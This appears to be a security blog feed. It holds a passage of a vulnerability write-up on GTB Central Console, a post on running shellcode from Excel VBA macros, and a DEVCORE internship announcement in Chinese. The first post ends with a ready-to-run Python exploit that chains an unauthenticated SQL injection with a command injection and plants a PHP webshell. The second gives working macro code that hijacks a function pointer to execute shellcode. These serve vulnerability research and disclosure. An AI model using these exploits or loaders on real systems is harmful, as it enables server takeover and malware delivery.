    if (($action != 'Action') && method_exists($pureApiObject, $action)) {
        echo json_encode($pureApiObject->$action($request), JSON_UNESCAPED_UNICODE);
    } else {
        echo json_encode([
            'error' => $action . ' not defined!',
        ], JSON_UNESCAPED_UNICODE);
    }
}

As we can see, the code loads two other PHP file, then check for the parameter action and concatenate the Action string to it. After that it check if exists a method with that name. If exists, then the method is called reusing the original parameters. For example, the request shown in the burp screenshot would end calling $object->getTermsAction($request). We can see this method at CCApi.class.php:

//...
    public function getTermsAction($request): array
    {
        return [
            'data' => file_exists('/opt/webapp/data/terms/terms.html') ? file_get_contents('/opt/webapp/data/terms/terms.html') : '',
            'hash' => file_exists('/opt/webapp/data/terms/terms.html') ? md5_file('/opt/webapp/data/terms/terms.html') : '',
        ];
    }
//...

Nothing interesting. But… and here comes the plot twist: just below there is a method called setTermAction that is driving a DeLorean to bring back from the past a beautiful SQL injection:

    public function setTermsHashAction($request): array
    {
        $resource = self::initPgConnection();

        if (!$request['userId']) {
            throw new \Exception('update term hash failed. UserId not specified');
        }

        $query = '
          UPDATE users 
          SET term_hash = \'' . ($request['hash'] ?? '') . '\'
          WHERE user_id = ' . $request['userId'] . ';
        ';

        $res = pg_query($resource, $query);

        if ($res === false) {
            throw new \Exception('update term hash failed.' . pg_last_error($resource));
        }

        @exec('sh /opt/webapp/shell/sync_users.sh');

        return [
            'status' => true,
            'hash'   => file_exists('/opt/webapp/data/terms/terms.html') ? md5_file('/opt/webapp/data/terms/terms.html') : '',
        ];
    }

Because I was not sure if I could update two columns at same time in postgresql, I had to ask to my friend @xassiz and he confirmed it was possible. So we have the next injection:

UPDATE users SET term_hash = 'X',arbitrary_column='arbitrary_value' WHERE user_id = 'Y';

Is there any column worth to be updated? (well… the table is called users so I guess you know how this will end, but not spoilers). Let’s find how to connect to the database:

[root@pwned webapp]# grep -ri psql | grep sh
ccup:	/usr/bin/psql -p $POSTGRES_PORT -U postgres postgres -c "ALTER USER \"$DB_NAME\" WITH PASSWORD 'dashboard';" > /dev/null
ccup:		/usr/bin/psql -p $POSTGRES_PORT -U postgres postgres -c "CREATE USER \"$DB_NAME\" WITH PASSWORD 'dashboard';" > /dev/null
ccup:	/usr/bin/psql -t -p $POSTGRES_PORT -U postgres postgres -c "SELECT datname FROM pg_database WHERE datistemplate = false AND datname LIKE 'dashboard%';"
ccup:	/usr/bin/psql -p $POSTGRES_PORT -U postgres postgres -c "ALTER USER \"$DB_NAME\" WITH PASSWORD 'dashboard';"
rpm_install/cc.service.functions:		psql -U dashboard -d dashboard  -c "ALTER TABLE events SET WITHOUT OIDS;ALTER TABLE inspector_event SET WITHOUT OIDS;" > /dev/null
rpm_install/cc.service.functions.uninstall:		psql -U dashboard -d dashboard  -c "ALTER TABLE events SET WITHOUT OIDS;ALTER TABLE inspector_event SET WITHOUT OIDS;" > /dev/null
shell/set_timezone:POSTGRES_VERSION=`/usr/bin/psql --version | awk '{print $3}' | awk -F '.' '{print $1}'`
shell/manage_address.sh:	/usr/bin/psql -q -t -p 17023 -U postgres dashboard -c "INSERT INTO configuration_network (id, dns_server) SELECT 16, '$_ADDRESS' WHERE NOT EXISTS (SELECT id FROM configuration_network WHERE id = 16);"
shell/manage_address.sh:	/usr/bin/psql -q -t -p 17023 -U postgres dashboard -c "UPDATE configuration_network SET dns_server = '$_ADDRESS' WHERE id = 16 AND dns_server='';"
shell/manage_address.sh:	_fp_storage=`/usr/bin/psql -q -t -p 17023 -U postgres dashboard -c "SELECT dbhost FROM scan_config_fpstorage;" | head -1 | sed -e "s/[\"\' \t]//g"`
shell/manage_address.sh:		/usr/bin/psql -q -t -p 17023 -U postgres dashboard -c "UPDATE scan_config_fpstorage SET dbhost='$_ADDRESS';"
shell/manage_address.sh:		_ADDRESS=`/usr/bin/psql -q -t -p 17023 -U postgres "dashboard" -c "SELECT dns_server FROM configuration_network WHERE id = 16;" | sed '/^$/d' | sed -e "s/[\"\' \t]//g"`
shell/manage_address.sh:	echo "Address in the database = "`/usr/bin/psql -q -t -p 17023 -U postgres "dashboard" -c "SELECT dns_server FROM configuration_network WHERE id = 16;" | sed '/^$/d' | sed -e "s/[\"\' \t]//g"`
src/AppBundle/Service/Backup.php:        exec('/usr/bin/psql -p 17023 -U postgres postgres -c "CREATE DATABASE ' . $this->postgresDB . ' WITH OWNER = dashboard;" 2>&1', $output, $return_var);
src/AppBundle/Service/Backup.php:            '/usr/bin/psql -p 17023 -U postgres postgres -d dashboard -c "DELETE FROM agents WHERE is_installed=true" 2>&1',
src/AppBundle/Service/Backup.php:        exec('/usr/bin/psql -p 17023 -U postgres postgres -c "ALTER USER ' . $this->postgresDB . ' WITH PASSWORD \'dashboard\'" 2>&1', $output, $return_var);
src/AppBundle/Service/Backup.php:        exec('/usr/bin/psql -p 17023 -U postgres postgres -c "ALTER USER ' . $this->postgresDB . ' WITH PASSWORD \'dashboard\'" 2>&1', $output, $return_var);

Then:

/usr/bin/psql -q -t -p 17023 -U postgres dashboard

We can see there is a passwd column ;P:

user_id                     | integer                     |              | not null | nextval('users_seq'::regclass)
 login                       | character varying(255)      |              | not null | 
 passwd                      | character varying(50)       |              |          | 
 email                       | character varying(255)      |              |          | 
 name                        | character varying(255)      |              | 
//...

We can see the the password is stored in a format that is hypertensive-friendly because it does not use salt. This hash is just the md5 of password@@@.

dashboard=# select user_id,passwd,email from users;
       1 | fcbde5e75de51ada20eb0594587db6cf | demo@gttb.com

Quick recap: in 10 minutes after the jailbreak I found a unauthenticated SQL injection that can be used to replace the Administrator password to a known value. The exploit is simple as:

/ccapi.php?action=setTermsHash&userId=1&hash=pwned',passwd%3d'[MD5 of the password you want to use]
Logged as Administrator
Administrator take-over!

3rd movement: Oda to Command Injections

All these exec(), system() and passthru() combined with bash scripts makes this a chronicle of a death foretold. I just did a grep and picked the one that looked easier to exploit (/opt/webapp/src/AppBundle/Controller/React/SystemSettingsController.php):

//...
public function systemSettingsDnsDataAction(Request $request)
    {
        /** @var ConfigurationNetworkHandler $cnh */
        $cnh     = $this->container->get('gtb.handler.configuration_network');
        $xaction = $request->request->get('xaction', null);
        if (!$xaction) {
            $content = json_decode($request->getContent(), true);
            $xaction = $content['xaction'];
        }

        /** @var Translator $translator */
        $translator = $this->container->get('translator');

        $ssRepo = $this->getDm()->getRepository('AppBundle:SystemSettings');

        switch ($xaction) {
            case 'read':
                $dns  = $cnh->getDnsServer();
                $data = [
                    'dnsServerIps' => $dns,
                    'cc_name'      => $ssRepo->getParameterByName(SystemSettings::PARAM_CC_NAME)->getValue(),
                    'host_name'    => trim(file_get_contents('/etc/hostname'))
                ];

                return new JsonResponse([
                    'results' => $data
                ]);
            case 'update':
                $data   = json_decode($request->request->get('data', '{}'), true);
                $status = false;

                if (isset($data['dnsServerIps'])) {
                    if (!$this->isMultiTenant()) {
                        $cnh->setDnsServer($data['dnsServerIps']);
                    }
                    $ssRepo->setParameterByName(SystemSettings::PARAM_CC_NAME, $data['cc_name']);
                    if (!$this->isMultiTenant()) {
                        exec('sudo /opt/webapp/shell/set_hostname.sh ' . $data['host_name']);
                    }
//...

Easy to exploit as whatever; my-payload. Unfortunately to interact with this endpoint you need to be authenticated as Administrator. Imagine if you had a vulnerability that would let you replace the Administrator to a known value and then authenticate as him. Oh, wait!.

Coda

This is a simple proof of concept that chains both vulnerabilities to create a webshell in the server.

#!/usr/bin/env python3

# Exploit for GTB Central Console (tested on v15.17.1-30814.NG)
# Author: Juan Manuel Fernandez (@TheXC3LL)



import sys
import requests
import json


if __name__ == "__main__":
    target = sys.argv[1]
    pwd = "196989cdcb8bf751d0513388f30f4783" # xc3ll

    # Exploit Pre-auth SQLi
    print("[*] Exploiting the SQLi...")
    req = requests.get(target + "/ccapi.php?action=setTermsHash&userId=1&hash=pwned',passwd%3d'" + pwd, verify=False)
    if not "true" in req.text:
        print("[!] Error. Exploit failed!\n")
        exit(-1)
    print("[*] Password updated to 'xc3ll'!")

    # Attempt to login
    print("[*] Getting a valid session using the new credentials...")
    form = {
            "_username" : (None, "Administrator"),
            "_password" : (None, "xc3ll")
            }
    headers = {
            "X-Sess-Token" : "pwned"
            }
    req = requests.post(target + "/old/login", files=form, headers=headers, verify=False)
    if "error" in req.text:
        print("[!] Error. Could not authenticate with 'Administrator:xc3ll'")
        exit(-1)
    session = json.loads(req.text)["session"]
    print("[*] Authenticated! session is " + session)

    # Let's exploit the command injection
    print("[*] Exploiting the command injection...")
    payload = '{"dnsServerIps":"8.8.8.8","cc_name":"","host_name":"adeptsof0xcc; echo PD9waHAgc3lzdGVtKCRfR0VUWyJyY2UiXSk7Pz4K| base64 -d   > /opt/webapp/web/pwned.php"}'
    form = {
        "xaction" : (None, "update"),
        "data" : (None, payload)
    }
    headers = {
        "Cookie" : "symfony=" + session + "; session=" + session,
    }
    req = requests.post(target + "/old/react/v1/api/system/dns/data", files=form, headers=headers, verify=False)
    if not "true" in req.text:
        print("[!] Error. Exploit failed!\n")
        exit(-1)
    print("[*] Seems like the webshell was uploaded to " + target + "/pwned.php")
    print("[*] Testing with 'id'...")
    req = requests.get(target + "/pwned.php?rce=id", verify=False)
    if not "nginx" in req.text:
        print("[!] Error. Exploit failed!\n")
    print("[*] It worked! Check output:\n\n" + req.text)
    print("\n\nHave a nice day ^_^")

Fire in the hole!

Kaboom!
Kaboom!

EoF

I know both vulnerabilities are trivial to spot and to exploit, and indeed it was a quick quest: 30 minutes to jailbreak it, 10 minutes to spot the SQLi and 10 minutes to spot the command injection.

But keep this in mind: this platform, and other similars, are widely deployed in corporative infrastructure. Tons of companies run products without knowning how insecure they are just because they are black-boxes that nobody wastes time to check. Most of cyber-cyber-cyber products are just clusterfucks of scripts in bash, perl, python or PHP combined with duct tape waiting to be pwned.

We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.

VBA: having fun with macros, overwritten pointers & R/W/X memory

12 January 2024 at 00:00

Dear Fellowlship, today’s homily is about an epiphany one of our owls had a couple of weekends ago: an alternative way for running shellcodes in macros. Please, take a seat and listen the story.

Prayers at the foot of the Altar a.k.a. disclaimer

I am writing this article because I had fun last weekend researching this and wanted to share my findings. Maybe this could be useful to someone, but to be honest my only intention is to use this post as a note to myself in the future. Keep in mind this is just a proof of concept. Also, if you are going to replicate anything explained here you need to place the code AS A NEW MODULE.

All roads lead to Rome

Generally speaking, to a greater or lesser degree, any macro designed to self-inject a shellcode inside its own process would follow the next steps:

  1. Allocate memory
  2. Copy the shellcode
  3. Set perms
  4. Trigger execution

Of course this is just an extremely summarized view of how this kind of macros works. In our times, where Initial Access has became far more difficult than 5 years ago, additional stuff is needed to setup the injection: unhooking, syscalling, etc.

Previously in this blog I explored different functions that could be used to copy the shellcode to a buffer (“One thousand and one ways to copy your shellcode to memory (VBA Macros)”). About how to trigger execution @nootrak wrote an article called “Abusing native Windows functions for shellcode execution”. Years later it was found one of these documented functions (lpLocaleEnumProc) being used by Lazarus group (“RIFT: Analysing a Lazarus Shellcode Execution Method”).

My previous article about VBA (“VBA: resolving exports in runtime without NtQueryInformationProcess or GetProcAddress”) was based on the premise of being less explicit in the functions that are imported from DLLs. Or, to be more precise, to avoid as much as possible leaving traces in the code of what the macro does. In this case, we reduced as much as necessary and built everything with RtlMoveMemory and DispCallFunc

My quest now takes me down the path of trying to get code execution from an arbitrary memory address without using any of the functions documented by Nootrak.

The art of taming pointers

In essence, if our goal is to get a shellcode executed in the context of our process… Isn’t that exactly what exploiting does? In the end, what we need is to hijack the natural flow of the program so that the execution deviates from its natural course and jumps into our immaculate and perfumed shellcode.

Therefore, the easiest thing to do would be to locate some pointer that we can overwrite that would be used later. But… memory space is dark and full of terrors. How can we find such a thing when VBA holds us captive in its prison?

Let’s reuse part of the code from our previous post:

' The "declares" are needed to keep the layout. It's a long story
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" ( _
                        ByVal Destination As LongPtr, _
                        ByVal Source As LongPtr, _
                        ByVal Length As Long)
                        
Private Declare PtrSafe Function NtClose Lib "ntdll" (ByVal ObjectHandle As LongPtr) As Long
Dim a As LongPtr

Function leak() As LongPtr
    a = 1337
    leak = VarPtr(a)
End Function


Sub test()
    Cells(1, 1) = "0x" & Hex(leak)
End Sub

If we check the address we can see there are a few pointers near:

Pointers near our location
Juicy pointers

To check if any of them were interesting I got a little playful and overwrote them with rubbish to see if Excel would crash because it tried to execute memory at an invalid address. And the best candidate so far was the one highlighted in dark blue/black: 0x02238f....

If we check that address we can see there is another pointer there:

A pointer pointing to a pointer
A pointer pointing to a pointer

And at that location we got an array of pointers to functions in Excel.

Party
Party

If you follow the execution with the debugger you would see that the previous pointer is just the address of the array base, and then it uses an offset to jump to any of the pointers in the array. In this case, it always end jumping at 0xB0. Summarized:

Diagram
Diagram

And to perform the hijack we need something like:

Attack diagram
Attack diagram

We need a buffer of data controlled by us, then place at 0xB0inside the buffer the address where the shellcode is going to be (it can be placed just after the address, so it would be at buffer address + 0xB0 + 8).

At this point you should be thinking something like “but we need to turn the buffer into executable memory”. And you are right, except by the fact that you can find memory with R/W/X perms inside Excel process :)

Who wants to marry my shellcode?

So here comes the second part of the post. To recap we found a reliable way to hijack the program flow in order to jump to whatever we want. And whatever we want is a memory zone that let us write and execute. If we use VirtualQuery we can see that indeed we can find some allocations that fits our needs.

Private Type MEMORY_BASIC_INFORMATION
    BaseAddress As LongPtr
    AllocationBase As LongPtr
    AllocationProtect As Long
    RegionSize As LongPtr
    State As Long
    Protect As Long
    lType As Long
End Type

Private Declare PtrSafe Function VirtualQuery Lib "KERNEL32" (ByVal lpAddress As LongPtr, lpBuffer As MEMORY_BASIC_INFORMATION, ByVal dwLength As LongPtr) As LongPtr

Function getTarget() As LongPtr
    Dim mbi As MEMORY_BASIC_INFORMATION
    Dim ret As LongPtr
    Dim dwLenght As LongPtr
    Dim j As Long
    
    j = 1
    For i = 0 To 50000
        ret = VirtualQuery(addr, mbi, LenB(mbi))
        If mbi.Protect = 64 Then
            Cells(j, 1) = "0x" + Hex(mbi.BaseAddress)
            Cells(j, 2) = "0x" + Hex(mbi.RegionSize)
            j = j + 1
        End If
        addr = mbi.BaseAddress + mbi.RegionSize
    Next i
End Function

Sub test()
    a = getTarget()
End Sub
RWX!
RWX!

If you execute more dummy functions before you would see that the number of suitable allocations is increased.

Keep in mind this is being used by the program, so overwriting it could end in a crash because you corrupted the heap or any data that the program would use later. Be careful, the best is trying to find a region full of zeroes and place there your shellcode. Unfortunately I barely found a region big enough and in all my tests I had to split the shellcode in smaller parts.

If we glue all together:

Private Type MEMORY_BASIC_INFORMATION
    BaseAddress As LongPtr
    AllocationBase As LongPtr
    AllocationProtect As Long
    RegionSize As LongPtr
    State As Long
    Protect As Long
    lType As Long
End Type

Private Declare PtrSafe Function VirtualQuery Lib "KERNEL32" (ByVal lpAddress As LongPtr, lpBuffer As MEMORY_BASIC_INFORMATION, ByVal dwLength As LongPtr) As LongPtr
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" ( _
                        ByVal Destination As LongPtr, _
                        ByVal Source As LongPtr, _
                        ByVal Length As Long)
                        
Private Declare PtrSafe Function NtClose Lib "ntdll" (ByVal ObjectHandle As LongPtr) As Long
Dim a As LongPtr

Function leak() As LongPtr
    Dim funcLeak As LongPtr
    Dim i As LongPtr
    Dim j As Long
    
    For i = 0 To 512 Step 8
        Call CopyMemory(VarPtr(funcLeak), VarPtr(a) + i, 8)
        If Left(Hex(funcLeak), 4) = Left(Hex(VarPtr(a)), 4) Then
            Cells(2, 2) = "0x" & Hex(funcLeak)
            Cells(2, 1) = "0x" & Hex(VarPtr(a))
            Exit For
        End If
    Next i
    leak = funcLeak
End Function

Function getTarget(counter As LongPtr) As LongPtr
    Dim mbi As MEMORY_BASIC_INFORMATION
    Dim ret As LongPtr
    Dim dwLenght As LongPtr
    Dim addr As LongPtr
    Dim check As LongPtr
    Dim j As LongPtr
    Dim k As LongPtr
    Dim napa As LongPtr
    addr = 0
    check = 1337
    
    For i = counter To 10000
        ret = VirtualQuery(addr, mbi, LenB(mbi))
        If mbi.Protect = 64 And mbi.RegionSize > 1024 Then
            For j = 0 To mbi.RegionSize - 100 Step 8
                napa = 1
                For k = 0 To 48 Step 8
                    Call CopyMemory(VarPtr(check), mbi.BaseAddress + j + k, 8)
                    If check <> 0 Then
                        napa = 2
                    End If
                Next k
                If napa = 1 Then
                    getTarget = mbi.BaseAddress + j
                    Exit For
                End If
            Next j
            Exit For
        End If
        addr = mbi.BaseAddress + mbi.RegionSize
    Next i
    Cells(1, 1) = "0x" + Hex(getTarget)
End Function

Sub test()
    Dim jmp As LongPtr
    Dim target As LongPtr
    Dim sc As LongPtr
    Dim check As LongPtr
    Dim buf As Variant
    Dim i As LongPtr
    jmp = leak
    check = 0
    '204 == 0xCC 144 == 0x90
    buf = Array(144, 144, 144, 144, 144, 204, 204, 204)

    target = getTarget(i)
    If target <> 0 Then
        sc = target + 8 + &HB0
        For n = LBound(buf) To UBound(buf)
            Call CopyMemory(sc + n, VarPtr(buf(n)) + 8, 8)
        Next n
    
        Call CopyMemory(target + &HB0, VarPtr(sc), 8)
        Call CopyMemory(jmp, VarPtr(target), 8)
    Else
        MsgBox "Cave not found!"
    End If
End Sub
Shellcode executed!
Shellcode executed!

All that glitters is not gold

This idea has tons of drawbacks. Although I have a reliable way to find the pointer to hijack, if I execute other stuff previously in the same process (e.g. a few innocent macros that do a lot of activity) sometimes (5%) the pointer I abuse is misplaced and I overwrite other that has no effect or it crashes the process.

On the other hand, it can be difficult to handle a big shellcode as it is really easy to overwrite something critical. I am pretty sure there is a way to find suitable regions and avoid this issue, but my knowledge is very light on these matters.

EoF

We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.

DEVCORE 2024 第五屆實習生計畫

4 January 2024 at 16:00

DEVCORE 創立迄今已逾十年,持續專注於提供主動式資安服務,並致力尋找各種安全風險及漏洞,讓世界變得更安全。為了持續尋找更多擁有相同理念的資安新銳、協助學生建構正確資安意識及技能,我們成立了「戴夫寇爾全國資訊安全獎學金」,2022 年初也開始舉辦首屆實習生計畫,目前為止成果頗豐、超乎預期,第四屆實習生計畫也將於今年 1 月底告一段落。我們很榮幸地宣佈,第五屆實習生計畫即將登場,若您期待加入我們、精進資安技能,煩請詳閱下列資訊後來信報名!

實習內容

本次實習分為 Binary 及 Web 兩個組別,主要內容如下:

  • Binary 以研究為主,在與導師確定研究標的後,分析目標架構、進行逆向工程或程式碼審查。藉由這個過程訓練自己的思路,找出可能的攻擊面與潛在的弱點。另外也會讓大家嘗試分析及寫過往漏洞的 Exploit,理解過去漏洞都出現在哪,體驗真實世界的漏洞都是如何利用。
    • 漏洞挖掘及研究 70 %
    • 1-day 開發 (Exploitation) 30 %
  • Web 導師會與學生討論並確定一個以學生的期望為主的實習目標,並在過程輔導成長以完成目標,內容可以是深入研究近年常見新型態漏洞、攻擊手法、開源軟體,或是程式語言生態系的常見弱點,亦或是展現你的技術力以開發與紅隊相關的工具。
    • 漏洞、攻擊手法或開發工具研究 90%
    • 成果報告與準備 10%

公司地點

台北市松山區八德路三段 32 號 13 樓

實習時間

  • 2024 年 3 月開始到 2024 年 7 月底,共 5 個月。
  • 每週工作兩天,工作時間為 10:00 – 18:00
    • 每週固定一天下午 14:00 - 18:00 必須到公司討論進度
      • 如果居住雙北外可彈性調整(但須每個組別統一)
    • 其餘時間皆為遠端作業

招募對象

  • 具有一定程度資安背景的學生,且可每週工作兩天
  • 此外並無其他招募限制,歷屆實習生可重複應徵
  • 對資格有任何疑慮,歡迎來信詢問

預計招收名額

  • Binary 組:2~3 人
  • Web 組:2~3 人

薪資待遇

每月新台幣 16,000 元

招募條件資格與流程

實習條件要求

Binary

  • 基本逆向工程及除錯能力
    • 能看懂組合語言並瞭解基本 Debugger 使用技巧
  • 基本漏洞利用能力
    • 須知道 Stack overflow、ROP 等相關利用技巧
  • 基本 Scripting Language 開發能力
    • Python、Ruby
  • 具備分析大型 Open Source 專案能力
    • 以 C/C++ 為主
  • 具備基礎作業系統知識
    • 例如知道 Virtual Address 與 Physical Address 的概念
  • Code Auditing
    • 知道怎樣寫的程式碼會有問題
      • Buffer Overflow
      • Use After free
      • Race Condition
  • 具備研究熱誠,習慣了解技術本質
  • 加分但非必要條件
    • CTF 比賽經驗
    • pwnable.tw 成績
    • 樂於分享技術
      • 有公開的技術 blog/slide、Write-ups 或是演講
    • 精通 IDA Pro 或 Ghidra
    • 有寫過 1-day 利用程式
    • 具備下列其中之一經驗
      • Kernel Exploit
      • Windows Exploit
      • Browser Exploit
      • Bug Bounty

Web

  • 熟悉 OWASP Web Top 10。
  • 理解 PortSwigger Web Security Academy 中所有的安全議題或已完成所有 Lab。
    • 參考連結:https://portswigger.net/web-security/all-materials
  • 理解計算機網路的基本概念。
  • 熟悉 Command Line 操作,包含 Unix-like 和 Windows 作業系統的常見或內建系統指令工具。
  • 熟悉任一種網頁程式語言(如:PHP、ASP.NET、JSP),具備可以建立完整網頁服務的能力。
  • 熟悉任一種 Scripting Language(如:Shell Script、Python、Ruby),並能使用腳本輔以研究。
  • 具備除錯能力,能善用 Debugger 追蹤程式流程、能重現並收斂問題。
  • 具備可以建置、設定常見網頁伺服器(如:Nginx、Apache)及作業系統(如:Linux)的能力。
  • 具備追根究柢的精神。
  • 加分但非必要條件
    • 曾經獨立挖掘過 0-day 漏洞。
    • 曾經獨立分析過已知漏洞並能撰寫 1-day exploit。
    • 曾經於 CTF 比賽中擔任出題者並建置過題目。
    • 擁有 OSCP 證照或同等能力之證照。

應徵流程

本次甄選一共分為二個階段:

第一階段:書面審查

第一階段為書面審查,會需要審查下列兩個項目

  • 履歷內容
  • 簡答題答案
    • 題目 1:請提出三個,你印象最深刻或感到有趣、於西元 2021 ~ 2023 年間公開的真實漏洞或攻擊鏈案例,並依自己的理解簡述說明各個漏洞的成因、利用條件和可以造成的影響。
    • 題目 2:實習期間想要研究的主題,請提出三個可能選擇的明確主題,並簡單說明提出的理由或想完成的內容,例如:
      • 研究◯◯開源軟體,找到可 RCE 的重大風險弱點。
      • 研究 AD CS 的攻擊手法,嘗試挖掘新的攻擊可能性或向量。
      • 研究常見的路由器,目標包括:AA-123 路由器、BB-456 無線路由器。
    • 題目 3(應徵 Binary 組需回答):該程式為一個 Local Server,可透過瀏覽網頁與之互動,該 Server 跑在 Windows 11 的電腦上。
      • 請分析上述所提供的 Server,並利用其中的功能,讓使用者瀏覽網頁後,可直接在 Windows 11 上跳出 calc.exe,另外也請盡量滿足下列條件
        • 不可跳任何警告視窗。
        • 使用者只要瀏覽網頁即可觸發不會有額外操作。
        • 瀏覽器限制為 Chrome 或是 MS Edge
      • 請務必寫下解題過程,並交 write-up,請盡你所能來解題,即使最後沒有成功,也請寫下您所嘗試過的方法及思路,本測驗將會以 write-up 為主要依據。

本階段收件截止時間為 2024/01/28 23:59,我們會根據您的履歷及題目所回答的內容來決定是否有通過第一階段,我們會在 10 個工作天內回覆。

第二階段:面試

此階段為 30~120 分鐘(依照組別需求而定,會另行通知)的面試,會有 2~3 位資深夥伴參與,評估您是否具備本次實習所需的技術能力與人格特質。

時間軸

  • 2024/01/05 - 2024/01/28 公開招募,書審截止
  • 2024/01/29 - 2024/02/22 面試
  • 2024/02/26 前回應結果,早面試會早收到結果
  • 2024/03/04 第五屆實習計畫於當週開始

報名方式

  • 請將您的履歷題目答案以 PDF 格式寄到 [email protected]
    • 履歷格式請參考範例示意(DOCXPAGESPDF)並轉成 PDF。若您有自信,也可以自由發揮最能呈現您能力的履歷。
    • 請於 2024/01/28 23:59 前寄出(如果名額已滿則視情況提早結束)
  • 信件標題格式:[應徵] 職位 您的姓名(範例:[應徵] Web 組實習生 王小美)
  • 履歷內容請務必控制在三頁以內,至少需包含以下內容:
    • 基本資料
    • 學歷
    • 實習經歷
    • 社群活動經歷
    • 特殊事蹟
    • 過去對於資安的相關研究
    • MBTI 職業性格測試結果(測試網頁

若有應徵相關問題,請一律使用 Email 聯繫,如造成您的不便請見諒,我們感謝您的來信,並期待您的加入!

❌
❌